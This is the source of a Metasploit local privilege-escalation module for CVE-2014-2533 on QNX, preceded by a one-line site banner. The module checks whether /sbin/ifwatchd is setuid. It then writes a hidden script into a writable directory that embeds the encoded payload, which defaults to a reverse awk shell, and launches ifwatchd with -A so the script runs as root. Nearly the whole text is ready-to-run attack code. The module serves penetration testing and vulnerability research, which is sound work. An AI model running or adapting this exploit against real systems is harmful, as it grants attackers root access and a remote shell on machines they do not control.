Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::Linux::Priv
10
  include Msf::Post::File
11
  include Msf::Exploit::FileDropper
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'ifwatchd Privilege Escalation',
19
        'Description' => %q{
20
          This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
21
          systems by exploiting the ifwatchd suid executable.
22

23
          ifwatchd allows users to specify scripts to execute using the '-A'
24
          command line argument; however, it does not drop privileges when
25
          executing user-supplied scripts, resulting in execution of arbitrary
26
          commands as root.
27

28
          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
29
          and 6.5.0 SP1 (x86).
30
        },
31
        'License' => MSF_LICENSE,
32
        'Author' => [
33
          'cenobyte', # Discovery and exploit
34
          'Tim Brown', # Independent discovery
35
          'bcoles' # Metasploit
36
        ],
37
        'References' => [
38
          ['CVE', '2014-2533'],
39
          ['BID', '66449'],
40
          ['EDB', '32153'],
41
          ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
42
        ],
43
        'DisclosureDate' => '2014-03-10',
44
        'Platform' => 'unix', # QNX
45
        'Arch' => ARCH_CMD,
46
        'SessionTypes' => %w[shell meterpreter],
47
        'Targets' => [['Automatic', {}]],
48
        'Privileged' => true,
49
        'Payload' => {
50
          'BadChars' => '',
51
          'DisableNops' => true,
52
          'Space' => 1024,
53
          'Compat' => {
54
            'PayloadType' => 'cmd',
55
            'RequiredCmd' => 'gawk generic'
56
          }
57
        },
58
        'DefaultOptions' => {
59
          'WfsDelay' => 10,
60
          'PAYLOAD' => 'cmd/unix/reverse_awk'
61
        },
62
        'Notes' => {
63
          'Stability' => [CRASH_SAFE],
64
          'Reliability' => [REPEATABLE_SESSION],
65
          'SideEffects' => []
66
        }
67
      )
68
    )
69
    register_advanced_options([
70
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
71
    ])
72
  end
73

74
  def ifwatchd_path
75
    '/sbin/ifwatchd'
76
  end
77

78
  def base_dir
79
    datastore['WritableDir']
80
  end
81

82
  def check
83
    return CheckCode::Safe("#{ifwatchd_path} is not setuid") unless setuid?(ifwatchd_path)
84

85
    CheckCode::Detected("#{ifwatchd_path} is setuid")
86
  end
87

88
  def exploit
89
    if !datastore['ForceExploit'] && is_root?
90
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
91
    end
92

93
    fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)
94

95
    script_path = "#{base_dir}/.#{rand_text_alphanumeric(10..15)}"
96

97
    print_status('Writing interface arrival event script...')
98

99
    cmd_exec "echo '#!/bin/sh' > #{script_path}"
100
    cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
101
    cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
102
    exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
103
    cmd_exec "echo \"#{exp}\" >> #{script_path}"
104
    cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
105
    register_file_for_cleanup(script_path)
106

107
    cmd_exec("chmod +x '#{script_path}'")
108

109
    print_status("Executing #{ifwatchd_path}...")
110
    interface = 'lo0'
111
    cmd_exec("#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo ")
112
  end
113
end
114

115